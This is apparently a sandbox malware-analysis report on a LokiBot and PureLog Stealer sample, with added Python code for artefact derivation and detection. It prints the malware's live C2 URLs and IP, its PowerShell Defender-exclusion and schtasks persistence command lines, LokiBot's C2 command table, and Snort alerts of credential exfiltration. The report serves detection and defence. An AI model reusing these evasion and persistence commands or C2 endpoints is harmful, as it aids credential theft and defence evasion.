
Windows Analysis Report
gunzipped.exe

Overview

General Information

Sample name: gunzipped.exe
Analysis ID: 1431964
MD5: 4b905e6548f4d5040fab8962cb71877e
SHA1: 15c3785700d10e32ce7e17d706194dd9baa8442a
SHA256: 6fd2687a66899aa63357f7434a418b2bd873eebda9520129b20fd3e7e889ced1
Tags: exe, Loki

Detection

Lokibot, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • gunzipped.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
    • powershell.exe (PID: 6948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7396 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7188 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gunzipped.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
    • gunzipped.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
  • mPvIOxEZXJsdYp.exe (PID: 7368 cmdline: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe MD5: 4B905E6548F4D5040FAB8962CB71877E)
    • schtasks.exe (PID: 7500 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mPvIOxEZXJsdYp.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
    • mPvIOxEZXJsdYp.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
  • cleanup
Name: Loki Password Stealer (PWS), LokiBot

Description:

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24 characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

FILE EXTENSION  FILE DESCRIPTION
.exe            A copy of the malware that will execute every time the user account is logged into
.lck            A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
.hdb            A database of hashes for data that has already been exfiltrated to the C2 server
.kdb            A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data. The second packet transmitted by Loki-Bot contains decrypted Windows credentials. The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version. The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE  PAYLOAD TYPE
0x26  Stolen Cryptocurrency Wallet
0x27  Stolen Application Data
0x28  Get C2 Commands from C2 Server
0x29  Stolen File
0x2A  POS (Point of Sale?)
0x2B  Keylogger Data
0x2C  Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

BYTE  INSTRUCTION DESCRIPTION
0x00  Download EXE & Execute
0x01  Download DLL & Load #1
0x02  Download DLL & Load #2
0x08  Delete HDB File
0x09  Start Keylogger
0x0A  Mine & Steal Data
0x0E  Exit Loki-Bot
0x0F  Upgrade Loki-Bot
0x10  Change C2 Polling Frequency
0x11  Delete Executables & Exit

Suricata Signatures

RULE SID  RULE NAME
2024311   ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
2024312   ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
2024313   ET TROJAN Loki Bot Request for C2 Commands Detected M1
2024314   ET TROJAN Loki Bot File Exfiltration Detected
2024315   ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
2024316   ET TROJAN Loki Bot Screenshot Exfiltration Detected
2024317   ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
2024318   ET TROJAN Loki Bot Request for C2 Commands Detected M2
2024319   ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
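The derivations in the LokiBot entry above (mutex from the Machine GUID, hidden folder and file names from mutex characters, the version/type/Binary ID layout of the HTTP payload, and the payload-type and C2-instruction tables) as one added Python example. This is not code from this report, from Joe Sandbox or from the Malpedia entry. Where the page is silent the example assumes: the MachineGuid string is hashed as ASCII and the MD5 hex digest is upper-cased before trimming; payload bytes 4-9 are opaque and skipped; the Binary ID is a NUL-terminated ASCII string. The sample GUID and the two payloads are constructed for the example.

```python
"""LokiBot host-artefact derivation and C2 payload-header triage.

Added example written for this report; it is not Joe Sandbox or LokiBot code.
It follows the description above: mutex = MD5(MachineGuid) trimmed to 24
characters, hidden folder = mutex chars 8-13, file stem = mutex chars 13-18,
HTTP payload = WORD version, WORD payload type, Binary ID from the 11th byte.
Assumptions not stated on the page: the MachineGuid is hashed as ASCII and the
hex digest is upper-cased; payload bytes 4-9 are treated as opaque; the Binary
ID is read as a NUL-terminated ASCII string.  The GUID and payloads below are
constructed for the example.
"""
import hashlib
import struct

# Payload types from the second WORD of the HTTP body (table above).
PAYLOAD_TYPES = {
    0x26: "Stolen Cryptocurrency Wallet",
    0x27: "Stolen Application Data",
    0x28: "Get C2 Commands from C2 Server",
    0x29: "Stolen File",
    0x2A: "POS (Point of Sale?)",
    0x2B: "Keylogger Data",
    0x2C: "Screenshot",
}

# Instruction bytes the bot accepts from the C2 (table above).
C2_COMMANDS = {
    0x00: "Download EXE & Execute",
    0x01: "Download DLL & Load #1",
    0x02: "Download DLL & Load #2",
    0x08: "Delete HDB File",
    0x09: "Start Keylogger",
    0x0A: "Mine & Steal Data",
    0x0E: "Exit Loki-Bot",
    0x0F: "Upgrade Loki-Bot",
    0x10: "Change C2 Polling Frequency",
    0x11: "Delete Executables & Exit",
}

DEFAULT_BINARY_ID = b"ckav.ru"
FILE_EXTENSIONS = ("exe", "lck", "hdb", "kdb")


def lokibot_mutex(machine_guid: str) -> str:
    """MD5 of the MachineGuid, upper-case hex, trimmed to 24 characters.

    ASCII encoding and upper-casing are assumptions of this example.
    """
    return hashlib.md5(machine_guid.encode("ascii")).hexdigest().upper()[:24]


def artifacts_from_mutex(mutex: str) -> dict:
    """Hidden %APPDATA% folder and file names derived from a 24-char mutex.

    Characters 8-13 (1-based, inclusive) name the folder and 13-18 the files,
    so B7E1C2CC98066B250DDB2123 gives %APPDATA%\\C98066\\ and 6B250D.*.
    """
    if len(mutex) != 24:
        raise ValueError("LokiBot mutex is 24 hex characters")
    folder, stem = mutex[7:13], mutex[12:18]
    return {
        "mutex": mutex,
        "folder": "%APPDATA%\\" + folder + "\\",
        "files": [stem + "." + ext for ext in FILE_EXTENSIONS],
    }


def artifacts_for_host(machine_guid: str) -> dict:
    """Convenience wrapper: MachineGuid -> expected on-disk artefacts."""
    return artifacts_from_mutex(lokibot_mutex(machine_guid))


def parse_payload_header(payload: bytes) -> dict:
    """Split a LokiBot POST body as described: version, type, Binary ID."""
    if len(payload) < 11:
        raise ValueError("payload shorter than the 11-byte LokiBot header")
    version, ptype = struct.unpack_from("<HH", payload, 0)
    # Bytes 4..9 are not described on the page; skipped here (assumption).
    binary_id = payload[10:].split(b"\x00", 1)[0]
    return {
        "version": version,
        "type": ptype,
        "type_name": PAYLOAD_TYPES.get(ptype, "unknown (0x%02X)" % ptype),
        "binary_id": binary_id.decode("ascii", "replace"),
        "default_binary_id": binary_id == DEFAULT_BINARY_ID,
    }


def c2_command_name(code: int) -> str:
    """Name of a C2 instruction byte, or 'unknown'."""
    return C2_COMMANDS.get(code, "unknown (0x%02X)" % code)


def build_payload(version: int, ptype: int, binary_id: bytes) -> bytes:
    """Construct a minimal header in the layout parsed above (test data only)."""
    return struct.pack("<HH", version, ptype) + b"\x00" * 6 + binary_id + b"\x00"


# Constructed sample inputs; the GUID is not from any real host.
SAMPLE_GUID = "3f2c9b1e-7a4d-4c2b-9e0f-1d2c3b4a5f60"
SAMPLE_PAYLOAD_DEFAULT = build_payload(18, 0x27, b"ckav.ru")
SAMPLE_PAYLOAD_CUSTOM = build_payload(18, 0x28, b"xyz.tld")

if __name__ == "__main__":
    print(artifacts_for_host(SAMPLE_GUID))
    print(parse_payload_header(SAMPLE_PAYLOAD_DEFAULT))
    print(parse_payload_header(SAMPLE_PAYLOAD_CUSTOM))
    print(c2_command_name(0x10))
```

To hunt on a live host, read the value of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid and pass it to artifacts_for_host; the returned folder and file names are the paths to check under %APPDATA%. Because the hashing details are assumed, confirm the derived mutex against the one actually created by a sample before relying on it.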
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=a"]}
Yara matches (PCAP)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |

Yara matches (memory dumps)

Source | Rule | Description | Author | Strings
00000000.00000002.1735179615.0000000003D49000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Lokibot_1f885282 | unknown | unknown | 0x17ab8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
(5 of 54 entries shown)

Yara matches (unpacked PE files)

Source | Rule | Description | Author | Strings
0.2.gunzipped.exe.76c0000.11.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.gunzipped.exe.3d49970.7.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.gunzipped.exe.3d49970.7.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.gunzipped.exe.76c0000.11.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
(5 of 67 entries shown)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", ProcessId: 6948, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", ProcessId: 6948, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe, ParentImage: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe, ParentProcessId: 7368, ParentProcessName: mPvIOxEZXJsdYp.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp", ProcessId: 7500, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", ProcessId: 7188, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", ProcessId: 6948, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", ProcessId: 7188, ProcessName: schtasks.exe
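The process-creation conditions behind the Sigma hits in the System Summary (PowerShell adding a Defender exclusion) and the Persistence hit just above (schtasks creating a task from an XML file in Temp, launched by a parent running out of a user profile folder), as one added Python detection example. This is not Joe Sandbox code and it does not reproduce the Sigma rules themselves, only the conditions visible in the report. It goes one step beyond the report: a PowerShell -EncodedCommand argument is base64/UTF-16LE decoded and searched as well, instead of matching base64 offsets the way the "Powershell Base64 Encoded MpPreference Cmdlet" rule does, and Set-MpPreference and the other -Exclusion* parameters are covered alongside Add-MpPreference -ExclusionPath. The event records are constructed: the three malicious command lines are copied from the process tree above; the benign controls, the encoded variant and the field layout are the example's own.

```python
"""Process-creation triage for the two behaviours this report's Sigma hits
cover: a Defender exclusion added through PowerShell and a scheduled task
created from an XML file in a Temp directory by a parent running out of a
user profile folder.

Added example written for this report; it is not Joe Sandbox code and does
not reproduce the Sigma rules verbatim, only the conditions visible in the
report.  Event records are constructed: the three malicious command lines
are copied from the process tree, the benign and encoded ones are made up.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


# (Add|Set)-MpPreference followed somewhere by an -Exclusion* parameter.
DEFENDER_EXCLUSION_RE = re.compile(r"(?:Add|Set)-MpPreference\b.*?-Exclusion\w*", re.I | re.S)
# powershell -e / -enc / -EncodedCommand <base64>
ENCODED_ARG_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# schtasks /Create ... /XML <path>
XML_ARG_RE = re.compile(r'/xml\s+"?([^"\s]+)', re.I)
TEMP_PATH_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Temp)\\", re.I)
USER_DIR_RE = re.compile(
    r"\\Users\\[^\\]+\\(?:Desktop|Downloads|AppData)\\|\\Users\\Public\\|\\ProgramData\\", re.I)


def expand_encoded_command(command_line: str) -> str:
    """Append the decoded -EncodedCommand script (UTF-16LE) so the same
    regexes run over it; returns the input unchanged if nothing decodes."""
    m = ENCODED_ARG_RE.search(command_line)
    if not m:
        return command_line
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return command_line
    return command_line + "\n" + script


def triage(events):
    """Run the checks over a list of ProcessEvent and return Findings."""
    findings = []
    for ev in events:
        exe = ev.image.rsplit("\\", 1)[-1].lower()
        cl = expand_encoded_command(ev.command_line)
        if exe in ("powershell.exe", "pwsh.exe"):
            m = DEFENDER_EXCLUSION_RE.search(cl)
            if m:
                findings.append(Finding(ev.pid, "defender_exclusion_via_powershell", m.group(0)))
        if exe == "schtasks.exe" and re.search(r"/create\b", cl, re.I):
            m = XML_ARG_RE.search(cl)
            if m and TEMP_PATH_RE.search(m.group(1)):
                findings.append(Finding(ev.pid, "schtasks_xml_from_temp", m.group(1)))
            if USER_DIR_RE.search(ev.parent_image):
                findings.append(Finding(ev.pid, "schtasks_parent_in_user_dir", ev.parent_image))
    return findings


def findings_by_pid(events):
    """{pid: [rule, ...]} in the order the rules fired."""
    out = {}
    for f in triage(events):
        out.setdefault(f.pid, []).append(f.rule)
    return out


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
# Constructed encoded variant of the exclusion command (UTF-16LE base64, as PowerShell expects).
_ENCODED = base64.b64encode('Add-MpPreference -ExclusionPath "C:\\Users\\Public"'.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    # Copied from the report's process tree.
    ProcessEvent(6948, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"', r"C:\Users\user\Desktop\gunzipped.exe"),
    ProcessEvent(7188, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"', r"C:\Users\user\Desktop\gunzipped.exe"),
    ProcessEvent(7500, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"', r"C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"),
    # Constructed controls: benign task query, benign Defender query, encoded exclusion.
    ProcessEvent(4242, r"C:\Windows\System32\schtasks.exe", r'schtasks.exe /Query /TN "Microsoft\Windows\Defrag\ScheduledDefrag"', r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(4243, PS, r'powershell.exe -NoProfile -Command "Get-MpPreference"', r"C:\Windows\explorer.exe"),
    ProcessEvent(4343, PS, "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED, r"C:\Users\user\Downloads\invoice.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f.pid, f.rule, f.detail)
```

Feed it Sysmon event 1 or Windows 4688 records mapped onto ProcessEvent. The parent-directory check is deliberately broad (Desktop and Downloads included) because in this report both parents were user-profile binaries; tune it to your environment's noise before alerting on it alone.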

Snort IDS Alerts

45 alerts over 15 connections from the sandbox host; every alert is TCP to destination port 80 with classtype "A Network Trojan was detected". One row per connection, sorted by timestamp; the SIDs column lists the rules that fired on that connection.

Timestamp                 Source Port  SIDs
04/26/24-04:57:08.113616  49737        2024312, 2021641, 2024317
04/26/24-04:57:09.548217  49738        2024312, 2021641, 2024317
04/26/24-04:57:10.856048  49741        2024313, 2021641, 2024318
04/26/24-04:57:12.236287  49742        2024313, 2021641, 2024318
04/26/24-04:57:16.639664  49743        2024313, 2021641, 2024318
04/26/24-04:57:18.033252  49744        2024313, 2021641, 2024318
04/26/24-04:57:19.622306  49745        2024313, 2021641, 2024318
04/26/24-04:57:21.056286  49746        2024313, 2021641, 2024318
04/26/24-04:57:22.484753  49747        2024313, 2021641, 2024318
04/26/24-04:57:23.949613  49749        2024313, 2021641, 2024318
04/26/24-04:57:25.359561  49752        2024313, 2021641, 2024318
04/26/24-04:57:26.717841  49754        2024313, 2021641, 2024318
04/26/24-04:57:28.121110  49756        2024313, 2021641, 2024318
04/26/24-04:57:29.559162  49757        2024313, 2021641, 2024318
04/26/24-04:57:31.331813  49758        2024313, 2021641, 2024318

AV Detection

Source: http://kbfvzoboss.bid/alien/fre.php, URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php, URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php, URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php, URL Reputation: Label: malware
Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=a"]}
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe, ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe, Virustotal: Detection: 32%
Source: gunzipped.exe, Virustotal: Detection: 32%
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe, Joe Sandbox ML: detected
Source: gunzipped.exe, Joe Sandbox ML: detected
Source: gunzipped.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: gunzipped.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49737 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49737 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49737 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49738 -> 45.77.223.48:80
